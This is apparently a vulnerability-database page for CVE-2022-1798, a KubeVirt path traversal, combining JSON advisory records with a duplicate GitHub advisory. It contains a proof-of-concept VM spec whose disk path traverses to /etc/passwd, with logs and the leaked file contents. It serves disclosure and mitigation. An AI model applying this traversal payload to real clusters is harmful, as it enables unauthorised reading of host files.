"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364" } ] }, "source": { "discovery": "EXTERNAL" } }, "gitlab.com": { "advisories": [ { "affected_range": "\u003e=0.20.0 \u003c0.55.1", "affected_versions": "All versions starting from 0.20.0 before 0.55.1", "cvss_v3": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "cwe_ids": [ "CWE-1035", "CWE-22", "CWE-937" ], "date": "2022-09-19", "description": "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible.", "fixed_versions": [ "0.55.1" ], "identifier": "CVE-2022-1798", "identifiers": [ "CVE-2022-1798", "GHSA-qv98-3369-g364" ], "not_impacted": "", "package_slug": "go/github.com/kubevirt/kubevirt", "pubdate": "2022-09-15", "solution": "Upgrade to version 0.55.1 or above.", "title": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)", "urls": [ "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364" ], "uuid": "53248d19-699a-448b-8098-ab304adcac1a" }, { "affected_range": "\u003c=0.53", "affected_versions": "All versions up to 0.53", "cwe_ids": [ "CWE-1035", "CWE-352", "CWE-937" ], "date": "2022-08-18", "description": "Relative Path Traversal in kubevirt.io/kubevirt.", "fixed_versions": [], "identifier": "GMS-2022-3668", "identifiers": [ "GHSA-cvx8-ppmc-78hm", "GMS-2022-3668", "CVE-2022-1798" ], "not_impacted": "", "package_slug": "go/kubevirt.io/kubevirt", "pubdate": "2022-08-18", "solution": "Unfortunately, there is no solution available yet.", "title": "Relative Path Traversal", "urls": [ "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", "https://github.com/advisories/GHSA-cvx8-ppmc-78hm" ], "uuid": "815806e6-b8e2-4abd-8822-0be903839c27" } ] }, "nvd.nist.gov": { "configurations": { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*", "cpe_name": [], "versionEndExcluding": "0.55.1", "versionStartIncluding": "0.20.0", "vulnerable": true } ], "operator": "OR" } ] }, "cve": { "CVE_data_meta": { "ASSIGNER": "security@google.com", "ID": "CVE-2022-1798" }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "en", "value": "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "en", "value": "CWE-22" } ] } ] }, "references": { "reference_data": [ { "name": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364", "refsource": "CONFIRM", "tags": [ "Exploit", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364" } ] } }, "impact": { "baseMetricV3": { "cvssV3": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.0, "impactScore": 4.0 } }, "lastModifiedDate": "2022-09-19T18:52Z", "publishedDate": "2022-09-15T16:15Z" } } }
ghsa-cvx8-ppmc-78hm
Vulnerability from github
Duplicate Advisory
This advisory is a duplicate of GHSA-qv98-3369-g364. This link is maintained to preserve external references.
Original Description
Summary As part of a Kubevirt audit performed by NCC group, a finding dealing with systemic lack of path sanitization which leads to a path traversal was identified. Google tested the exploitability of the paths in the audit report and identified that when combined with another vulnerability one of the paths leads to an arbitrary file read on the host from the VM.
The read operations are limited to files which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.
Severity
Moderate - The vulnerability is proven to exist in an open source version of KubeVirt by NCC Group while being combined with Systemic Lack of Path Sanitization, which leads to Path traversal.
Proof of Concept
The initial VMI specifications can be written as such to reproduce the issue:
```
apiVersion: kubevirt.io/v1 kind: VirtualMachineInstance metadata: name: vmi-fedora spec: domain: devices: disks: - disk: bus: virtio name: containerdisk - disk: bus: virtio name: cloudinitdisk - disk: bus: virtio name: containerdisk1 rng: {} resources: requests: memory: 1024M terminationGracePeriodSeconds: 0 volumes: - containerDisk: image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0 name: containerdisk - containerDisk: image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0 path: test3/../../../../../../../../etc/passwd name: containerdisk1 - cloudInitNoCloud: userData: | #!/bin/sh echo 'just something to make cirros happy' name: cloudinitdisk
``` The VMI can then be started through kubectl apply -f vm-test-ncc.yaml. The requested file is accessible once the VM is up and can be accessed under /dev/vdc.
Depending on the environment, path may contain more or less /.., something that can easily be tested by checking the events until the VMI can start without failure. Restrictions
SELinux may mitigate this vulnerability.
When using a node with selinux, selinux denies the access and the VM start was aborted:
```
19s Warning SyncFailed virtualmachineinstance/vmi-fedora server error. command SyncVMI failed: "preparing ephemeral container disk images failed: stat /var/run/kubevirt/container-disks/disk_0.img: permission denied"
type=AVC msg=audit(1651828898.296:1266): avc: denied { setattr } for pid=44402 comm="rpc-worker" name="passwd" dev="vda1" ino=691477 scontext=system_u:system_r:virt_launcher.process:s0:c255,c849 tcontext=system_u:object_r:passwd_file_t:s0 tclass=file permissive=1
```
After making selinux permissive the VM can boot and access /etc/passwd from the node within the guest:
```
$ sudo cat /dev/vdc root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin [...]
```
Further Analysis In order to mitigate this vulnerability, Sanitize imagePath in pkg/container-disk/container-disk.go following ISE best practices described and Add checks in pkg/virt-api/webhooks/validating-webhook/admitters/vmi-create-admitter.go
Timeline Date reported: 05/10/2022 Date fixed: N/A Date disclosed: 08/08/2022
{ "affected": [ { "package": { "ecosystem": "Go", "name": "kubevirt.io/kubevirt" }, "ranges": [ { "events": [ { "introduced": "0.20.0" }, { "fixed": "0.55.1" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2022-1798" ], "database_specific": { "cwe_ids": [ "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2022-08-18T19:02:18Z", "nvd_published_at": "2022-09-15T16:15:00Z", "severity": "MODERATE" }, "details": "## Duplicate Advisory\nThis advisory is a duplicate of [GHSA-qv98-3369-g364](https://github.com/advisories/GHSA-qv98-3369-g364). This link is maintained to preserve external references.\n\n## Original Description\n\n**Summary**\nAs part of a Kubevirt audit performed by NCC group, a finding dealing with systemic lack of path sanitization which leads to a path traversal was identified. Google tested the exploitability of the paths in the audit report and identified that when combined with another vulnerability one of the paths leads to an arbitrary file read on the host from the VM.\n\nThe read operations are limited to files which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible.\n\n**Severity**\n\nModerate - The vulnerability is proven to exist in an open source version of KubeVirt by NCC Group while being combined with Systemic Lack of Path Sanitization, which leads to Path traversal.\n\n**Proof of Concept**\n\nThe initial VMI specifications can be written as such to reproduce the issue:\n\n```\n\napiVersion: kubevirt.io/v1\nkind: VirtualMachineInstance\nmetadata:\n name: vmi-fedora\nspec:\n domain:\n devices:\n disks:\n - disk:\n bus: virtio\n name: containerdisk\n - disk:\n bus: virtio\n name: cloudinitdisk\n - disk:\n bus: virtio\n name: containerdisk1\n rng: {}\n resources:\n requests:\n memory: 1024M\n terminationGracePeriodSeconds: 0\n volumes:\n - containerDisk:\n image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0\n name: containerdisk\n - containerDisk:\n image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0\n path: test3/../../../../../../../../etc/passwd\n name: containerdisk1\n - cloudInitNoCloud:\n userData: |\n #!/bin/sh\n echo \u0027just something to make cirros happy\u0027\n name: cloudinitdisk\n\n\n```\nThe VMI can then be started through kubectl apply -f vm-test-ncc.yaml.\nThe requested file is accessible once the VM is up and can be accessed under /dev/vdc.\n\nDepending on the environment, path may contain more or less /.., something that can easily be tested by checking the events until the VMI can start without failure.\nRestrictions \n\nSELinux may mitigate this vulnerability.\n\nWhen using a node with selinux, selinux denies the access and the VM start was aborted:\n\n```\n\n19s Warning SyncFailed virtualmachineinstance/vmi-fedora server error. command SyncVMI failed: \"preparing ephemeral container disk images failed: stat /var/run/kubevirt/container-disks/disk_0.img: permission denied\"\n\ntype=AVC msg=audit(1651828898.296:1266): avc: denied { setattr } for pid=44402 comm=\"rpc-worker\" name=\"passwd\" dev=\"vda1\" ino=691477 scontext=system_u:system_r:virt_launcher.process:s0:c255,c849 tcontext=system_u:object_r:passwd_file_t:s0 tclass=file permissive=1\n\n```\n\nAfter making selinux permissive the VM can boot and access /etc/passwd from the node within the guest:\n\n```\n\n$ sudo cat /dev/vdc\nroot:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\n[...]\n\n```\n\n**Further Analysis**\nIn order to mitigate this vulnerability, Sanitize imagePath in pkg/container-disk/container-disk.go following ISE best practices described and Add checks in pkg/virt-api/webhooks/validating-webhook/admitters/vmi-create-admitter.go\n\n**Timeline**\nDate reported: 05/10/2022\nDate fixed: N/A\nDate disclosed: 08/08/2022", "id": "GHSA-cvx8-ppmc-78hm", "modified": "2022-09-30T00:44:46Z", "published": "2022-08-18T19:02:18Z", "references": [ { "type": "WEB", "url": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm" }, { "type": "WEB", "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798" }, { "type": "PACKAGE", "url": "https://github.com/kubevirt/kubevirt" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "type": "CVSS_V3" } ], "summary": "Duplicate Advisory: KubeVirt arbitrary host file read from the VM", "withdrawn": "2022-09-30T00:44:46Z" }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.